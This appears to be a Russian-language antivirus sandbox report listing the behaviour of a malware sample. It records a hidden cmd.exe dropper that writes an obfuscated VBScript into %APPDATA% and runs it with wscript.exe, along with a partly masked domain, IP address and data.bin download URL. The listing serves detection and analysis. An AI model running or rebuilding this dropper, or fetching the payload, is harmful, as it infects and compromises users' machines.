Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "R0zX=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm ACupe" "FuNCTiON SDYYHq(Oa0hwhe)" "TzaJaYk=18" "DiM WZ,QGH51" "PO8v=32" "PemsY="MAm3"" "MhK=15" "On ERRoR RESUMe NexT" "IMHFcN=3" "BI...
- %APPDATA%\16059.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\16059.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "R0zX=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm ACupe" "FuNCTiON SDYYHq(Oa0hwhe)" "TzaJaYk=18" "DiM WZ,QGH51" "PO8v=32" "PemsY="MAm3"" "MhK=15" "On ERRoR RESUMe NexT" "IMHFcN=3" "BI...' (со скрытым окном)